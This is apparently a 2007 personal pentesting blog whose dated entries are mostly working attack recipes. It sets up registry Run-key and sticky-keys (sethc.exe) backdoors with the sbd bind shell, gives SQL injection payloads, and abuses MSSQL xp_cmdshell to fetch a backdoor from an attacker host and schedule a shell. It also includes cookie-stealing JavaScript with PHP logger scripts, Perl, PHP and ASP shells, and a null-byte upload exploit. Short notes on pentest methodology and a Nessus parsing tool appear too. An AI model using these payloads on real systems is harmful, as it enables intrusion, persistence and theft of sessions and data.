Fork me on GitHub
Its the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No Wait.. It should be just RUBY!

20070330

Month of ... bugs

1. Month of browser bugs
2. Month of apple bugs
3. Month of kernel bugs
4. Month of PHP bugs
5. Month of MySPACE bugs

eh.. ergg.. cough.. die. this fad is getting old.. I hate even commenting on this at all.

20070328

Setting and Confirming reg keys w/meterpreter.

super quick meterpreter sequence
Prep
upload c:\\sbdbg.exe c:\\windows\\system32\\


Set
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbd.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"


Verify
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor


Use
(reboot)

20070323

Comparing Common Vulnerability Result Sets

One of the major things I've been working on is bring together vulnerability result information. I found that it was a major pain in ass to be able to remove duplicate entries from result sets. I was finally able to come up with listing for based on CVE / BID tracking numbers:

An example corresponding file could be something like this

Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]

Just extracting Nessus Information can be a huge problem. Because of the lack of structure within the nasl scripting language, there are many many variations on the output generated by the plugins. I've made some additional changes to an old tool.

nessus_extract.pl (version 1.7) [download perl]

I added pipes into the fray, generating a recursive style csv to separate BID and CVE numbers as well as a more robust double-quote word qualifier.

One huge help is the Open Source Vulnerability Data Base (osvdb) which has come a long way.

20070315

Pentest Order of Objects..

ISSAF was used in conjuction with the latest backtrack release.
Although it is not my company's standard it is quite close.

Not to be too open.. but this has lead to a really good idea for object orient coding.

Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT

INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Searchengine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS-Fingerprinting
-Portscanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping(Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (metasploit)
-Exploits (CoreImpact / Canvas)
-Exploits (milworm /secfocus)

GAINING ACCESS AND PRIVILEGE ESCALATION

-Password Attacks
-Default Conf Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (ie. WMI,SNMP,CDP)
-Pull Passwords (hashes, SAM FILES)
-Priviledged Assessment(Repeat all Steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Portknocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning

20070313

SBD as netcat

Yeah so I rattle off some SBD stuff sometimes.. Im referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor located @ http://tigerteam.se/dl/sbd/. This is my perferred "swiss army knife" because of its default configuration of encryption(AES-CBC-128 + HMAC-SHA1 encryption) and dangerous execution binding (-e command).



Netcat and its NC Clones:

  • netcat - "swiss army knife"
  • sbd & sbdbg.exe - shadowinteger's backdoor
  • netcat6 - swiss army knife+ for ipv6
  • cryptcat - netcat with twofish encryption
  • socat - Multipurpose relay(netcat++) IPV6/SSL Example usage:
    socat TCP6-LISTEN:8080,reuseaddr,fork PROXY: proxy:www.domain.com:80

Simpler tools:
None of this is news.. I just wanted to point out some of this simple stuff.

20070308

sbd fun as a rookit via sethc.exe

SBD Fun

Transfering files
RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 –q 10


Transfering files through .tar.gz
RCV: sbd -l -p 4337 | tar xvfpz –
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337


PORT Scan:
echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000


Using Cmd.exe to bind to service
In my experience this is flaky at best..

create then start service:
sc create testsvc binpath= "cmd /K start" type= interact
sc start testsvc


Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).

SCM starts a service
RegisterServiceCtrlHandler API

We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.

Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost in this example.)
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}


Rootkit portion
Rename output binary to sethc.exe .. works ok.

Prefetch restrictions.
Remember to delete any exisiting sethc.exe files in c:\windows\prefetch prior to use.

Interesting Note about RDC
Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.

Apparently the SYSTEM Kernel security shuts down all unknown process on sweep @5 minutes into session.

Can there fake handler for WM_CLOSE? or terminate...

20070307

PNG Listener w/logger

This is an example of a simple PNG listener with a logging mechanism.
(Do I really have to explain how to use this?)

<?php
$cookie = $_GET["c"];
if ($cookie == "init")
{$file = fopen('001.txt', 'w');
fwrite($file, ":: 00* Logger:: \n");
}
else{
$file = fopen('001.txt', 'a');
fwrite($file, $_SERVER['REMOTE_ADDR']."=>".$cookie . "\n");
}
header("Content-type: image/png");
$im = imageCreate(1,1);
$background = imageColorAllocate($im, 255, 255, 255);
imagePNG($im);
imageDestroy($im);
}
?>


I developed this snippet while working on a solution for browser history leaks.

SQL injection and identification

Identify sql Server through Blind SQL injection

http://example.com/index.php?some_var=1/*!40017%20s*/

MySQL is at least 4.0.17 if you get a different result.

## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access

Normal Union attack
$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--


MS-SQL

Check if we are admins
IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))


Check things like
MSSQL_OPENQUERY
(select 1 from OPENQUERY([$servername],'select 1'))


MSSQL_OPENROWSET
(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))

or
(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))


If we have a linked server and sa
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

If already sa
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')

Other things todo
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

20070306

reverse-shell from SQL server

So you go the super secret sa password (or they left it blank~?)

osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"

{SQL template}
osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"

Pull data back to SQL:

c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe

Or be obvious:
net user add

On semi-evil box hoster: (Serve TFTP or FTP)
sbdbg.exe

{SQL template} set up FTP command script:
ECHO GET sbdbg > script.ftp
ECHO QUIT >> script.ftp

{SQL template} Execute FTP script:
FTP -s:script.ftp -A semi.evil.host.ip

{SQL template} setup reverse shell:
echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat

{SQL template} get time on server:
Dont forget ICMP timestamp requests instead..
time

{SQL template} schedule execution of bat file
at \\sql.vuln.box\ 04:20 evil.bat

connect from any.evil.ip
sbd sql.vuln.box 4337

Just some simple shell notes:

Image inclusion
php (serverside - local/remote)
- will parse comments in jpegs during file inclusions/requires
IE (clientside - local)
- will parse files contents of images

PNG Headers
\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <=png Header
\x00\x00\x00\x0d <= Chunksize
\x77\x6f\x6f\x74 <= Chunkid "Woot"
\x00\x00\x00\x01 <= Height
\x00\x00\x00\x01 <= Width

Comment writers for jpegs
edjpgcom

Basic php shell
<?php
ob_clean();
system("[command]");
die();
?>


Using Echo
For windows:
echo: ^(carrots) are the escape sequence for systemIO redirects.
echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext

unix:
write lol from echo with hex (no newline) to file
echo -en "\x6c\x6f\x6c" > file.ext


SBD (netcat style):
File Recieving
sbd -lvp 1234 < NUL > outfile.ext
Banner Grabbing
sbd -c off -v www.microsoft.com 80
Binding Shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"

although plink -raw and telnet are not as good they can work.

Play with Cookies

Simple cookie push
<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>


Cookie View
Javascript:alert(document.cookie);


Manipulate Cookie
Javascript:void(document.cookie=“variable=value”);


stealer.php
<?php
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>


Other stealers
<?php // line 1
$cookie = $_GET["c"]; // line 2
$file = fopen('000.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4

global $Redirect;
$Redirect = getenv("HTTP_REFERER");
echo getenv("HTTP_REFERER");

echo "<script>window.location.replace('".$Redirect."')</script>";
?>


Perl shell
#!/usr/bin/perl
use Socket;
$port=911;
$proto=getprotobyname('tcp');
$system='cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}


ASP Quicky whoami ?
<%
Dim wShell, objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
set objNetwork = nothing
%>


ASP Shell
- WshShell.Exec error '80070005' likely
<%
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
intReturn = wshell.run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write( intReturn )
set wshell = nothing
%>


Curl into older PHP servers from chroot skeletons.

<?php
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
print_r(curl_getinfo($ch));
$file=curl_exec($ch);

$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
//echo $file;
$data = $file;

print $data;
?>


Null Bytes
PHP garbage
The null byte is represented with '%00' in php
C:\c99.php%00.jpg

CGI null byte stuff too..
see... php null byte

ASP null byte
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.

POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------
AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe .png"
Content-Type: text/plain
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"
Upload
-----------------------------AAAAAAAAAAAAA